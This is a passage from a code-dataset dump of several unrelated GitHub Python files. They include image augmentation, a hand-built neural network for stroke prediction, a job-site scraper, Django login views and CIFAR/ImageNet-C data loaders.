img.resize(target_size, Image.BILINEAR)\n else:\n img = [item.resize(target_size, Image.BILINEAR) for item in img]\n if labelmap is not None:\n labelmap = labelmap.resize(target_size, Image.NEAREST)\n\n if maskmap is not None:\n maskmap = maskmap.resize(target_size, Image.NEAREST)\n\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nPIL_AUGMENTATIONS_DICT = {\n 'random_saturation': RandomSaturation,\n 'random_hue': RandomHue,\n 'random_perm': RandomPerm,\n 'random_contrast': RandomContrast,\n 'random_brightness': RandomBrightness,\n 'random_gauss_blur': RandomGaussBlur,\n 'random_hsv': RandomHSV,\n 'random_pad': RandomPad,\n 'random_border': RandomBorder,\n 'random_hflip': RandomHFlip,\n 'random_resize': RandomResize,\n 'random_crop': RandomCrop,\n 'random_focus_crop': RandomFocusCrop,\n 'random_det_crop': RandomDetCrop,\n 'random_resized_crop': RandomResizedCrop,\n 'random_rotate': RandomRotate,\n 'resize': Resize\n}\n\n\nclass PILAugCompose(object):\n \"\"\"Composes several transforms together.\n\n Args:\n transforms (list of ``Transform`` objects): list of transforms to compose.\n\n Example:\n >>> PILAugCompose([\n >>> RandomCrop(),\n >>> ])\n \"\"\"\n def __init__(self, configer, split='train'):\n self.configer = configer\n self.transforms = dict()\n self.split = split\n self.trans_dict = self.configer.get(split, 'aug_trans')\n shuffle_train_trans = []\n if 'shuffle_trans_seq' in self.trans_dict:\n if isinstance(self.trans_dict['shuffle_trans_seq'][0], list):\n train_trans_seq_list = self.trans_dict['shuffle_trans_seq']\n for train_trans_seq in train_trans_seq_list:\n shuffle_train_trans += train_trans_seq\n\n else:\n shuffle_train_trans = self.trans_dict['shuffle_trans_seq']\n\n for trans in self.trans_dict['trans_seq'] + shuffle_train_trans:\n if 'func' in self.trans_dict[trans]:\n self.transforms[trans] = PIL_AUGMENTATIONS_DICT[self.trans_dict[trans]['func']](**self.trans_dict[trans]['params'])\n else:\n self.transforms[trans] = PIL_AUGMENTATIONS_DICT[trans](**self.trans_dict[trans])\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert self.configer.get('data', 'input_mode') == 'RGB'\n shuffle_trans_seq = []\n if 'shuffle_trans_seq' in self.trans_dict:\n if isinstance(self.trans_dict['shuffle_trans_seq'][0], list):\n shuffle_trans_seq_list = self.trans_dict['shuffle_trans_seq']\n shuffle_trans_seq = shuffle_trans_seq_list[random.randint(0, len(shuffle_trans_seq_list))]\n else:\n shuffle_trans_seq = self.trans_dict['shuffle_trans_seq']\n random.shuffle(shuffle_trans_seq)\n\n for trans_key in (shuffle_trans_seq + self.trans_dict['trans_seq']):\n (img, labelmap, maskmap, kpts,\n bboxes, labels, polygons) = self.transforms[trans_key](img, labelmap, maskmap,\n kpts, bboxes, labels, polygons)\n\n out_list = [img]\n for elem in [labelmap, maskmap, kpts, bboxes, labels, polygons]:\n if elem is not None:\n out_list.append(elem)\n\n return out_list if len(out_list) > 1 else out_list[0]\n","repo_name":"donnyyou/torchcv","sub_path":"lib/data/pil_aug_transforms.py","file_name":"pil_aug_transforms.py","file_ext":"py","file_size_in_byte":52510,"program_lang":"python","lang":"en","doc_type":"code","stars":2235,"dataset":"github-code","pt":"21"} +{"seq_id":"5605314794","text":"from __future__ import print_function\n\nfrom abc import abstractmethod\nimport math\nimport random\nimport copy\nfrom numpy.core.numeric import NaN\nimport pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom collections import Counter\nimport os.path\nfrom os import path\nimport imblearn.over_sampling as RandomOverSampling\nfrom sklearn import preprocessing\n\n\nclass ComputationalNode(object):\n\n @abstractmethod\n def forward(self, x): # x is an array of scalars\n pass\n\n @abstractmethod\n def backward(self, dz): # dz is a scalar\n pass\n\n\nclass MultiplyNode(ComputationalNode):\n\n def __init__(self):\n self.x = [0., 0.] # x[0] is input, x[1] is weight\n\n def forward(self, x):\n self.x = x\n return self.x[0] * self.x[1]\n\n def backward(self, dz):\n return [dz * self.x[1], dz * self.x[0]]\n\n\nclass SumNode(ComputationalNode):\n\n def __init__(self):\n self.x = [] # x is in an array of inputs\n\n def forward(self, x):\n self.x = x\n return sum(self.x)\n\n def backward(self, dz):\n return [dz for xx in self.x]\n\n\nclass SigmoidNode(ComputationalNode):\n\n def __init__(self):\n self.x = 0. # x is an input\n\n def forward(self, x):\n self.x = x\n return self._sigmoid(self.x)\n\n def backward(self, dz):\n return dz * self._sigmoid(self.x) * (1. - self._sigmoid(self.x))\n\n def _sigmoid(self, x):\n return 1. / (1. + math.exp(-x))\n\n\nclass TanhNode(ComputationalNode):\n\n def __init__(self):\n self.x = 0. # x is an input\n\n def forward(self, x):\n self.x = x\n return self._tanh(self.x)\n\n def backward(self, dz):\n return dz * (1. - (self._tanh(self.x))**2)\n\n def _tanh(self, x):\n return (math.exp(x) - math.exp(-x)) / (math.exp(x) + math.exp(-x))\n\n\nclass ReluNode(ComputationalNode):\n\n def __init__(self):\n self.x = 0. # x is an input\n\n def forward(self, x):\n self.x = x\n return self._relu(self.x)\n\n def backward(self, dz):\n return dz * (1. if self.x > 0. else 0.)\n\n def _relu(self, x):\n return max(0., x)\n\n\nclass NeuronNode(ComputationalNode):\n\n def __init__(self, n_inputs, activation):\n self.n_inputs = n_inputs\n self.multiply_nodes = [] # for inputs and weights\n self.sum_node = SumNode() # for sum of inputs*weights\n\n for n in range(n_inputs): # collect inputs and corresponding weights\n mn = MultiplyNode()\n mn.x = [1., random.gauss(0., 0.1)] # init input weights\n self.multiply_nodes.append(mn)\n\n mn = MultiplyNode() # init bias node\n mn.x = [1., random.gauss(0., 0.01)] # init bias weight\n self.multiply_nodes.append(mn)\n\n if activation == 'sigmoid':\n self.activation_node = SigmoidNode()\n elif activation == 'relu':\n self.activation_node = ReluNode()\n elif activation == \"tanh\":\n self.activation_node = TanhNode()\n else:\n raise RuntimeError(\n 'Unknown activation function \"{0}\".'.format(activation))\n\n self.previous_deltas = [0.] * (self.n_inputs + 1)\n self.gradients = []\n\n def forward(self, x): # x is a vector of inputs\n x = copy.copy(x)\n x.append(1.) # for bias\n\n for_sum = []\n for i, xx in enumerate(x):\n inp = [x[i], self.multiply_nodes[i].x[1]]\n for_sum.append(self.multiply_nodes[i].forward(inp))\n\n summed = self.sum_node.forward(for_sum)\n summed_act = self.activation_node.forward(summed)\n return summed_act\n\n def backward(self, dz):\n dw = []\n dx = []\n b = dz[0] if type(dz[0]) == float else sum(dz)\n\n b = self.activation_node.backward(b)\n b = self.sum_node.backward(b)\n for i, bb in enumerate(b):\n dw.append(self.multiply_nodes[i].backward(bb)[1])\n dx.append(self.multiply_nodes[i].backward(bb)[0])\n\n self.gradients = dw\n return dx\n\n def update_weights(self, learning_rate, momentum):\n for i, multiply_node in enumerate(self.multiply_nodes):\n mean_gradient = self.gradients[i]\n delta = learning_rate*mean_gradient + \\\n momentum*self.previous_deltas[i]\n self.previous_deltas[i] = delta\n self.multiply_nodes[i].x[1] -= delta\n\n self.gradients = []\n\n\nclass NeuralLayer(ComputationalNode):\n\n def __init__(self, n_inputs, n_neurons, activation):\n self.n_inputs = n_inputs\n self.n_neurons = n_neurons\n self.activation = activation\n\n self.neurons = []\n # construct layer\n for _ in range(n_neurons):\n neuron = NeuronNode(n_inputs, activation)\n self.neurons.append(neuron)\n\n def forward(self, x): # x is a vector of \"n_inputs\" elements\n layer_output = []\n for neuron in self.neurons:\n neuron_output = neuron.forward(x)\n layer_output.append(neuron_output)\n\n return layer_output\n\n def backward(self, dz): # dz is a vector of \"n_neurons\" elements\n b = []\n for idx, neuron in enumerate(self.neurons):\n neuron_dz = [d[idx] for d in dz]\n neuron_dz = neuron.backward(neuron_dz)\n b.append(neuron_dz[:-1])\n\n return b # b is a vector of \"n_neurons\" elements\n\n def update_weights(self, learning_rate, momentum):\n for neuron in self.neurons:\n neuron.update_weights(learning_rate, momentum)\n\n\nclass NeuralNetwork(ComputationalNode):\n\n def __init__(self):\n # construct neural network\n self.layers = []\n\n def add(self, layer):\n self.layers.append(layer)\n\n def forward(self, x): # x is a vector which is an input for neural net\n prev_layer_output = None\n for idx, layer in enumerate(self.layers):\n if idx == 0: # input layer\n prev_layer_output = layer.forward(x)\n else:\n prev_layer_output = layer.forward(prev_layer_output)\n\n return prev_layer_output # actually an output from last layer\n\n def backward(self, dz):\n next_layer_dz = None\n for idx, layer in enumerate(self.layers[::-1]):\n if idx == 0:\n next_layer_dz = layer.backward(dz)\n else:\n next_layer_dz = layer.backward(next_layer_dz)\n\n return next_layer_dz\n\n def update_weights(self, learning_rate, momentum):\n for layer in self.layers:\n layer.update_weights(learning_rate, momentum)\n\n def fit(self, X, Y, learning_rate, momentum, nb_epochs, shuffle=False, verbose=0):\n assert len(X) == len(Y)\n\n hist = []\n for epoch in range(nb_epochs):\n if shuffle:\n random.seed(epoch)\n random.shuffle(X)\n random.seed(epoch)\n random.shuffle(Y)\n\n total_loss = 0.0\n for x, y in zip(X, Y):\n # forward pass to compute output\n pred = self.forward(x)\n # compute loss\n grad = 0.0\n for o, t in zip(pred, y):\n total_loss += (t - o) ** 2.\n grad += -(t - o)\n # backward pass to compute gradients\n self.backward([[grad]])\n # update weights with computed gradients\n self.update_weights(learning_rate, momentum)\n\n hist.append(total_loss)\n if verbose == 1:\n print('Epoch {0}: loss {1}'.format(epoch + 1, total_loss))\n print('Loss: {0}'.format(total_loss))\n return hist\n\n def predict(self, x):\n return self.forward(x)\n\n\ndef normalize(data):\n x_min = min(data)\n x_max = max(data)\n retval = []\n for x in data:\n retval.append((x-x_min)/(x_max-x_min))\n return retval\n\ndef explore(X,Y):\n encodx = pd.get_dummies(X)\n types = encodx.columns.values\n sumlist = []\n for i in types:\n sum = 0\n #Koliko 1 ima u enkodovanom nizu, koje daju 1 na izlazu\n for s in zip(Y.values, encodx[i].values):\n if s[0] == 1 and s[1] == 1:\n sum += 1\n sumlist.append(sum)\n x_pos = [i for i, _ in enumerate(types)]\n pyplot.style.use('ggplot')\n pyplot.bar(x_pos, sumlist)\n pyplot.xticks(x_pos, types)\n pyplot.show()\n\ndef oversample(data):\n max_size = data['stroke'].value_counts().max()\n lst = [data]\n for class_index, group in data.groupby('stroke'):\n lst.append(group.sample(max_size-len(group), replace=True))\n frame_new = pd.concat(lst)\n return frame_new\n\nif __name__ == '__main__':\n \n\n data = pd.read_csv(\n \"C:\\\\Users\\\\Andrea\\\\Desktop\\\\OneDrive_2021-05-26\\\\Kolokvijum 2\\\\dataset.csv\")\n \n data.dropna(inplace=True) #Remove NaN rows\n #Oversampling\n #print(data['stroke'].value_counts())\n data=oversample(data)\n #print(data['stroke'].value_counts())\n explore(data.ever_married,data.stroke)\n genderdata = pd.get_dummies(data.gender) #Gender OneHotEncoding data\n work_type_encoded = pd.get_dummies(data.work_type) #WorkType OneHotEncoding data\n smoking_status_encoded = pd.get_dummies(data.smoking_status) #SmokingStatus OneHotEncoding data\n ever_married_data = data['ever_married'].replace({'Yes': 1, 'No': 0}, inplace=False)\n Y = data['stroke'].values\n #DataNormalization\n age_data_normalized = normalize(data.age.values)\n avg_glucose_level_normalized = normalize(data.avg_glucose_level.values)\n bmi_data_normalized = normalize(data.bmi.values)\n #Create input data\n X = list(zip(data.heart_disease, age_data_normalized, data.hypertension, avg_glucose_level_normalized, bmi_data_normalized,\n ever_married_data.values,\n work_type_encoded.Govt_job, work_type_encoded.Never_worked, work_type_encoded.Private, work_type_encoded['Self-employed'].values,\n work_type_encoded.children,\n smoking_status_encoded['Unknown'].values, smoking_status_encoded['formerly smoked'].values, smoking_status_encoded['never smoked'].values, \n smoking_status_encoded['smokes'].values))\n \n #Oversampling zbog malog broja True izlaza\n #oversample = RandomOverSampling.RandomOverSampler(sampling_strategy=0.5)\n #X_over, Y_over = oversample.fit_resample(X, Y)\n\n #Splitovanje dataseta na train/test (70/30)\n X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.3, random_state=100)\n \n #Input/Output za trening\n X_trainn = [list(d) for d in X_train]\n y_trainn = [[float(s)] for s in y_train]\n #Input/Output za test\n X_testt = [list(d) for d in X_test]\n y_testt = [[float(s)] for s in y_test]\n #print(f\"Training target statistics: {Counter(y_train)}\")\n #print(f\"Testing target statistics: {Counter(y_test)}\")\n\n if(path.exists(\"C:\\\\Users\\\\Andrea\\\\Desktop\\\\OneDrive_2021-05-26\\\\Kolokvijum 2\\\\nn.p\")):\n nn = pickle.load(open(\n \"C:\\\\Users\\\\Andrea\\\\Desktop\\\\OneDrive_2021-05-26\\\\Kolokvijum 2\\\\nn.p\", \"rb\"))\n else:\n nn = NeuralNetwork()\n nn.add(NeuralLayer(15, 18, 'sigmoid'))\n nn.add(NeuralLayer(18, 10, 'tanh'))\n nn.add(NeuralLayer(10, 1, 'sigmoid'))\n history = nn.fit(X_trainn, y_trainn, learning_rate=0.1,\n momentum=0.3, nb_epochs=100, shuffle=True, verbose=1)\n pyplot.plot(history)\n pyplot.show()\n pickle.dump(nn, open(\"C:\\\\Users\\\\Andrea\\\\Desktop\\\\OneDrive_2021-05-26\\\\Kolokvijum 2\\\\nn.p\", \"wb\"))\n\n true_positiv = 0\n true_negativ = 0\n false_positive = 0\n false_negative = 0\n #testiranje\n for idx, xx in enumerate(X_testt):\n #print(xx)\n #print(y_test[idx])\n p = nn.predict(xx)\n # print(p)\n if y_testt[idx] == [1.0]:\n if p[0] > 0.5:\n true_positiv += 1\n else:\n false_negative += 1\n else: # stvarno je bilo false\n if p[0] < 0.5: # predividnjeno je false\n true_negativ += 1\n else:\n false_positive += 1\n\n print(f\"TP: {true_positiv}\")\n print(f\"TN: {true_negativ}\")\n print(f\"FP: {false_positive}\")\n print(f\"FN: {false_negative}\")\n precision = true_positiv/(true_positiv+false_positive)\n recall = true_positiv/(true_positiv+false_negative)\n print(f\"Precision: {precision}\")\n print(f\"Recall: {recall}\")\n f1score= precision*recall / (precision+recall)\n print(f\"F1 Score: {f1score}\")","repo_name":"aleksandarbrkljac/simple_neural_network_heart_attack","sub_path":"ann_comp_graph.py","file_name":"ann_comp_graph.py","file_ext":"py","file_size_in_byte":12617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33135654341","text":"# Given an N x N image matrix, rotate the image by 90 degrees\n\nimport numpy as np\n\ndef rotate_matrix(matrix):\n N = matrix.shape[0]\n\n # Loop through top, right, bottom, left layer by layer till inner most\n for i in range(N // 2):\n for j in range(i, N-i-1):\n # Intuitive reasoning behind mapping of top -> right -> bottom -> left -> top\n top_i, top_j = i, j\n right_i, right_j = j, N-i-1\n bottom_i, bottom_j = N-i-1, N-j-1\n left_i, left_j = N-j-1, i\n\n # Make use of Python's multiple assignments functionality and update values in place\n matrix[top_i, top_j], matrix[right_i, right_j], matrix[bottom_i, bottom_j], matrix[left_i, left_j] = \\\n matrix[left_i, left_j], matrix[top_i, top_j], matrix[right_i, right_j], matrix[bottom_i, bottom_j]\n\n return matrix\n\nif __name__ == \"__main__\":\n # TEST\n input_matrix = np.arange(1, 122).reshape(11, 11)\n print(\"INPUT:\\n\", input_matrix)\n\n output_matrix = rotate_matrix(input_matrix)\n print(\"OUTPUT\\n\", output_matrix)","repo_name":"utsavtiwary/Cracking-The-Coding-Interview","sub_path":"Chapter_1/rotate_matrix.py","file_name":"rotate_matrix.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18377905461","text":"import gtda\nfrom gtda.graphs import GraphGeodesicDistance\nfrom gtda.diagrams import PersistenceEntropy,NumberOfPoints,Amplitude\nfrom gtda.homology import VietorisRipsPersistence, SparseRipsPersistence, FlagserPersistence\n\n\ndef computing_PD(cors, homology_dimensions=[0,1]):\n\n # Construct the simplicial complex sequence based on the cors\n # and compute the persistence diagrams\n\n \n # matrix pre-processing\n for i in range(len(cors)):\n cor = cors[i]\n cor = abs(cor)\n cor = np.nan_to_num(cor)\n\n # Since the filtration starts at 0,\n # 1-cor is used as the strength of the functional connectivities\n cor = 1 - cor \n\n # To ensure that the network is symmetric\n for ii in range(cor.shape[0]):\n for jj in range(ii):\n cor[ii, jj] = cor[jj, ii]\n cor[ii, ii] = 0\n cors[i] = cor\n\n # Construct the simplicial complex\n VR = VietorisRipsPersistence(metric=\"precomputed\", homology_dimensions=homology_dimensions)\n\n # Compute the persistence diagrams\n dgms = VR.fit_transform(cors)\n \n return dgms\n\ndef computing_Betti_curve(dgm,delta = 0.01,homology_dimension=0.0):\n \n # Compute the Betti curve\n\n # dgm: the persistence diagram to be processed\n # delta: the intervals of points on the Betti curve\n # homology_dimension: the dimension of the Betti curve\n \n betti=np.zeros(int(1/delta+1))\n \n # the dgms in a sequence have the same size\n # delete the padded topological features\n if homology_dimension !=0.0:\n dgm = np.unique(dgm, axis=0)\n else:\n betti=betti+1\n \n # Selete the persistence with the corresponding dim \n index = np.where(dgm[:,2]==homology_dimension)\n persistence = dgm[index][:,0:2]\n\n # Compute the Betti curve\n for per in persistence:\n b=int(per[0]/0.01)\n d=int(per[1]/0.01)\n betti[b:d]=betti[b:d]+1\n\n return betti\n","repo_name":"ZJUCAGD/DNN","sub_path":"Functional_Network_Of_DNN/src/Simplicial_complex_model.py","file_name":"Simplicial_complex_model.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8109753305","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom tools import get_position\nfrom datetime import datetime,timedelta\nfirst_url = 'http://guangzhou.jianzhimao.com/dbx_zbx_0/index'\n\n\ndef get_html(url):\n rep = requests.get(url)\n if rep.status_code != 200:\n log.error(\"网址(%s)无法访问,状态码:%d\" % (url, rep.status_code))\n return None\n html = rep.content\n return html\n\ndef get_urls(page_url):\n \"\"\"\n 获取单页页的兼职链接标题\n :param page_url:\n :return:\n \"\"\"\n jobs_data = []\n\n html = get_html(page_url)\n html = BeautifulSoup(html,\"html.parser\")\n data = html.findAll(\"a\",href = re.compile(r'/job/[0-9a-zA-Z]{16}.html'))\n\n for i in data :\n job_data = {}\n url = \"http://guangzhou.jianzhimao.com\" + i.attrs['href']\n job_data['web_url'] = url\n title = i.attrs[\"title\"]\n job_data['title'] = title\n jobs_data.append(job_data)\n return jobs_data\n\ndef get_all_urls(first_url):\n \"\"\"\n 获取所有url,title\n :param first_url:\n :return:\n \"\"\"\n jobs_data = []\n for i in range(11):\n i += 1\n page_url = first_url + str(i) + \".html\"\n print(page_url)\n jobs_data += get_urls(page_url)\n print(len(jobs_data))\n # for i in jobs_data:\n # print(i)\n return jobs_data\nurl1 = \"http://guangzhou.jianzhimao.com/job/V2c2TUlIRklZL2c9.html\"\nurl2 = \"http://guangzhou.jianzhimao.com/job/UFVBZmF6TVgwakk9.html\"\ndef get_time(html):\n # html = get_html(url)\n html = BeautifulSoup(html,\"html.parser\")\n a = html.findAll(\"span\",{\"class\":\"date right yellow\"})[0].get_text()\n if \"昨天\" in a:\n day = 1\n elif \"前天\" in a:\n day = 2\n elif \"前\" in a:\n day = 0\n else:\n day = -1\n date = 0\n if day != -1:\n date = datetime.now().date() - timedelta(days=day)\n return date\n\ndef get_company(url):\n html = get_html(url)\n html = str(BeautifulSoup(html, \"html.parser\"))\n print(html)\n company = re.findall(r'(.+)>发布者: (.+)?<(.*)', html)[0][1]\n return company\n# get_time(url1)\n# get_all_urls(first_url)\nget_company(url1)","repo_name":"wususu/part-time-job","sub_path":"fetch/jianzhimao.py","file_name":"jianzhimao.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"33182576090","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.contrib.auth import (\n\tlogin as login_to_site,\n\tlogout as logout_from_site\n)\nfrom django.shortcuts import render_to_response, redirect, RequestContext\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import update_last_login\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.utils.decorators import method_decorator\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.views.generic import View\nfrom app.rhea.forms import LoginForm\nimport random\n\nclass LoginView(View):\n\n\t@method_decorator(csrf_protect)\n\tdef get(self, request):\n\n\t\t# Check if user has been authenticated before - if so, redirect him/her to the main site\n\t\tif request.user is not None and request.user.is_authenticated():\n\n\t\t\t# Redirect to specified URL\n\t\t\treturn redirect(request.GET.get('next', reverse_lazy('user:view', kwargs = {\n\t\t\t\t'user_id': request.user.user_id\n\t\t\t})))\n\n\t\t# Create the login form and render the template\n\t\tbackground = random.randint(1, 2)\n\t\tform = LoginForm()\n\t\treturn render_to_response('rhea/accounts/login.html', context = RequestContext(request, locals()))\n\t@method_decorator(csrf_protect)\n\tdef post(self, request):\n\n\t\t# Check if user has been authenticated before - if so, redirect him/her to the main site\n\t\tif request.user is not None and request.user.is_authenticated():\n\n\t\t\t# Redirect to specified URL\n\t\t\treturn redirect(request.GET.get('next', reverse_lazy('user:view', kwargs = {\n\t\t\t\t'user_id': request.user.user_id\n\t\t\t})))\n\n\t\tform = LoginForm(request.POST)\n\t\tif form.is_valid():\n\n\t\t\tuser = form.user\n\t\t\tlogin_to_site(request, user)\n\t\t\tupdate_last_login(None, user = user)\n\n\t\t\treturn redirect(request.GET.get('next', reverse_lazy('user:view', kwargs = {\n\t\t\t\t'user_id': user.user_id\n\t\t\t})))\n\n\t\t# Resend the user to the login form to retry\n\t\tbackground = random.randint(1, 2)\n\t\treturn render_to_response('rhea/accounts/login.html',\n\t\t\tcontext = RequestContext(request, locals()),\n\t\t\tstatus = 401\n\t\t)\nlogin = LoginView.as_view()\n\nclass LogoutView(View):\n\n\t@method_decorator(login_required)\n\t@method_decorator(csrf_protect)\n\tdef get(self, request):\n\n\t\t# Proceed to log out the user\n\t\tlogout_from_site(request)\n\t\treturn redirect(reverse_lazy('accounts:login'))\nlogout = LogoutView.as_view()\n","repo_name":"legua25/project-rhea","sub_path":"app/rhea/views/accounts.py","file_name":"accounts.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73727497972","text":"n, m = map(int, input().split())\r\nconnect = []\r\nfor i in range(n+1):\r\n connect.append([])\r\n\r\nfor i in range(m):\r\n a, b = map(int, input().split())\r\n connect[a].append(b)\r\n connect[b].append(a)\r\n\r\nvisited = [False] * (n+1)\r\nstack = []\r\ncount = 0\r\nfor i in range(1, n+1):\r\n if visited[i] == False:\r\n stack.append(i)\r\n visited[i] = True\r\n while len(stack) > 0:\r\n result = True\r\n for check in connect[stack[-1]]:\r\n if visited[check] == False:\r\n stack.append(check)\r\n visited[check] = True\r\n result = False\r\n break\r\n if result == True:\r\n stack.pop()\r\n count += 1\r\nprint(count)\r\n# for i in range(1, n+1): # 1부터 정점까지 순회\r\n","repo_name":"eprj453/algorithm","sub_path":"PYTHON/BAEKJOON/11724_연결요소의갯수.py","file_name":"11724_연결요소의갯수.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30661107282","text":"import os\nimport pickle\n\nimport torch\nimport torchvision\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\n\nfrom robustbench.data import load_cifar10c, load_cifar100c\nfrom .CustomCifarC_Dataset import CustomCifarC_Dataset\nfrom .Dataset_Idx import Dataset_Idx\nfrom .DomainNet126 import DomainNet126\nfrom .augmentations import get_augmentation_versions, NCropsTransform\nfrom .augmentations.transforms_memo_cifar import aug_cifar\nfrom .augmentations.transforms_memo_imagenet import aug_imagenet\nfrom .data_list import *\nfrom .selectedRotateImageFolder import SelectedRotateImageFolder\n\nnormalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\ntr_transforms = transforms.Compose([transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n # transforms.ColorJitter(brightness=0.4, contrast=0.4, saturation=0.4, hue=0.2),\n transforms.ToTensor(),\n normalize])\nte_transforms = transforms.Compose([transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n normalize])\n\n\ndef get_transform(dataset_name, adaptation, num_augment=1):\n \"\"\"\n Get transformation pipeline\n Note that the data normalization is done inside of the model\n :param dataset_name: Name of the dataset\n :param adaptation: Name of the adaptation method\n :return: transforms\n \"\"\"\n if adaptation in {\"adacontrast\", \"plue\"}:\n # adacontrast requires specific transformations\n if dataset_name in {\"cifar10\", \"cifar100\", \"cifar10_c\", \"cifar100_c\"}:\n transform = get_augmentation_versions(aug_versions=\"twss\", aug_type=\"moco-v2-light\", res_size=32,\n crop_size=32)\n elif dataset_name == \"imagenet_c\":\n # note that ImageNet-C is already resized and centre cropped\n transform = get_augmentation_versions(aug_versions=\"twss\", aug_type=\"moco-v2-light\", res_size=224,\n crop_size=224)\n elif dataset_name in {\"domainnet126\"}:\n transform = get_augmentation_versions(aug_versions=\"twss\", aug_type=\"moco-v2\", res_size=256, crop_size=224)\n else:\n # use classical ImageNet transformation procedure\n transform = get_augmentation_versions(aug_versions=\"iwss\", aug_type=\"moco-v2\", res_size=256, crop_size=224)\n elif adaptation == \"memo\":\n original_transform = get_transform(dataset_name, None)\n transform_list = [original_transform]\n if 'cifar' in dataset_name:\n transform_aug = aug_cifar\n transforms_one = transforms.Compose([original_transform, transform_aug])\n else:\n transforms_list = original_transform.transforms[:-1]\n transforms_list.append(aug_imagenet)\n transforms_list.append(normalize)\n transforms_one = transforms.Compose(transforms_list)\n\n for i in range(num_augment):\n transform_list.append(transforms_one)\n transform = NCropsTransform(transform_list)\n\n else:\n # create non-method specific transformation\n if 'cifar' in dataset_name:\n transform = transforms.Compose([transforms.ToTensor()])\n elif dataset_name == \"imagenet_c\":\n # note that ImageNet-C is already resized an centre cropped\n transform = transforms.Compose([transforms.CenterCrop(224),\n transforms.ToTensor(),\n normalize])\n else:\n # use classical ImageNet transformation procedure\n transform = transforms.Compose([\n transforms.Resize((256, 256)),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n normalize\n ])\n\n return transform\n\n\ndef load_imagenet_c(root, corruption, transforms, level=5, batch_size=64, workers=4, ckpt=None):\n assert os.path.exists(root), f'Path {root} does not exist'\n assert corruption in ['brightness', 'contrast', 'defocus_blur', 'elastic_transform', 'fog', 'frost',\n 'gaussian_blur', 'gaussian_noise', 'glass_blur', 'impulse_noise', 'jpeg_compression',\n 'motion_blur', 'pixelate', 'saturate', 'shot_noise', 'snow', 'spatter', 'speckle_noise',\n 'zoom_blur'], f'Unknown corruption: {corruption}'\n\n validdir = os.path.join(root, corruption, str(level))\n teset = SelectedRotateImageFolder(validdir, transforms, original=False,\n rotation=False)\n\n ckpt_dir = os.path.join(ckpt, 'imagenet_c')\n if not os.path.exists(ckpt_dir):\n os.makedirs(ckpt_dir)\n ckpt_path = os.path.join(ckpt_dir, 'list.pickle')\n if not os.path.exists(ckpt_path):\n idx = torch.randperm(len(teset))\n idx = [i.item() for i in idx]\n with open(ckpt_path, 'wb') as f:\n pickle.dump(idx, f)\n else:\n with open(ckpt_path, 'rb') as f:\n idx = pickle.load(f)\n teset.samples = [teset.samples[i] for i in idx]\n teset.switch_mode(True, False)\n teloader = torch.utils.data.DataLoader(teset, batch_size=batch_size, shuffle=False,\n num_workers=workers, pin_memory=True)\n\n return teset, teloader\n\n\ndef load_cifar10_c(root, corruption, level=5, batch_size=64, workers=4, transforms=None, ckpt=None):\n assert os.path.exists(root), f'Path {root} does not exist'\n assert corruption in ['brightness', 'contrast', 'defocus_blur', 'elastic_transform', 'fog', 'frost',\n 'gaussian_blur', 'gaussian_noise', 'glass_blur', 'impulse_noise', 'jpeg_compression',\n 'motion_blur', 'pixelate', 'saturate', 'shot_noise', 'snow', 'spatter', 'speckle_noise',\n 'zoom_blur'], f'Unknown corruption: {corruption}'\n xtest, ytest = load_cifar10c(n_examples=10000, severity=level, data_dir=root, shuffle=False,\n corruptions=[corruption])\n teset = CustomCifarC_Dataset((xtest, ytest), transform=transforms)\n\n ckpt_dir = os.path.join(ckpt, 'cifar10_c')\n if not os.path.exists(ckpt_dir):\n os.makedirs(ckpt_dir)\n ckpt_path = os.path.join(ckpt_dir, 'list.pickle')\n if not os.path.exists(ckpt_path):\n idx = torch.randperm(len(teset))\n idx = [i.item() for i in idx]\n with open(ckpt_path, 'wb') as f:\n pickle.dump(idx, f)\n else:\n with open(ckpt_path, 'rb') as f:\n idx = pickle.load(f)\n teset = torch.utils.data.Subset(teset, idx)\n\n teloader = torch.utils.data.DataLoader(teset, batch_size=batch_size, shuffle=False, num_workers=workers,\n pin_memory=True)\n return teset, teloader\n\n\ndef load_cifar100_c(root, corruption, level=5, batch_size=64, workers=4, transforms=None, ckpt=None):\n assert os.path.exists(root), f'Path {root} does not exist'\n assert corruption in ['brightness', 'contrast', 'defocus_blur', 'elastic_transform', 'fog', 'frost',\n 'gaussian_blur', 'gaussian_noise', 'glass_blur', 'impulse_noise', 'jpeg_compression',\n 'motion_blur', 'pixelate', 'saturate', 'shot_noise', 'snow', 'spatter', 'speckle_noise',\n 'zoom_blur'], f'Unknown corruption: {corruption}'\n\n xtest, ytest = load_cifar100c(n_examples=10000, severity=level, data_dir=root, shuffle=False,\n corruptions=[corruption])\n teset = CustomCifarC_Dataset((xtest, ytest), transform=transforms)\n\n ckpt_dir = os.path.join(ckpt, 'cifar100_c')\n if not os.path.exists(ckpt_dir):\n os.makedirs(ckpt_dir)\n 